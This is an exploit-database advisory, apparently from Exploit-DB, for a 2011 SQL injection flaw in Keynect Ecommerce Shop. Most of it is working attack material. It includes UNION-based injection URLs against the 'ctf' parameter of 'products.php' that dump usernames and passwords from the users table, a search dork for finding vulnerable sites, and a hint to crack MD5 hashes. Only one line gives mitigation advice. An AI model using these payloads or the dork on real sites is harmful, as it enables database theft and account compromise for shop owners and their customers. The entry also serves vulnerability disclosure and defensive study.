SQL Injection Keynect Ecommerce

vendor:

Keynect Ecommerce SHop

by:

Arturo Zamora

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Keynect Ecommerce SHop

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows Xp

2011

SQL Injection Keynect Ecommerce

An attacker can exploit this vulnerability by sending malicious SQL queries to the vulnerable application. The malicious queries can be sent through the 'ctf' parameter of the 'products.php' page. An attacker can use the 'UNION' operator to retrieve data from the database. For example, an attacker can use the following URL to retrieve data from the 'users' table: http://localhost.com/products.php?ctf=-1+union+select+0,1,2,3,4,5,6,concat%28ID,username,password%29,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+users

Mitigation:

Input validation should be used to prevent SQL injection attacks. The application should also be configured to use parameterized queries.

Source

Exploit-DB raw data:

========================================================================================
| # Title    : SQL Injection Keynect Ecommerce                                         |
| # Author   : Arturo Zamora                                                           |
| # email    : Arturo_zamora_c@hotmail.com                                             |
| # DAte     : 10/03/2011                                                              |
| # Verified : yes                                                                     |
| # Risk     : High                                                                    |
| # Published:                                                                         |
| # Script   : Powered by Keynect Ecommerce SHop http://www.keynect.co.uk/             |
| # Dork     : inurl:products.php?ctf=                                                 |
| # Tested on: Windows Xp                                                              |
======================         zeux0r 2011             =================================
Exploit  :
====================== 

http://localhost.com//products.php?ctf={sqli}


====================== 
example:
======================

http://localhost.com/products.php?ctf=-1+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+information_schema.tables--


http://localhost.com/products.php?ctf=-1+union+select+0,1,2,3,4,5,6,concat%28ID,username,password%29,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+users


====================== 
Information :
====================== 

password decrypt md5
 
====================== 
 
I Love U Pumosita

================================   Mexican shotos  ========================================
Greetz : all my friend * zer0-zo0rg * Bucio * Klanx * Xoxonaizer * GothicX * Duuf * Murder etc
-------------------------------------------------------------------------------------------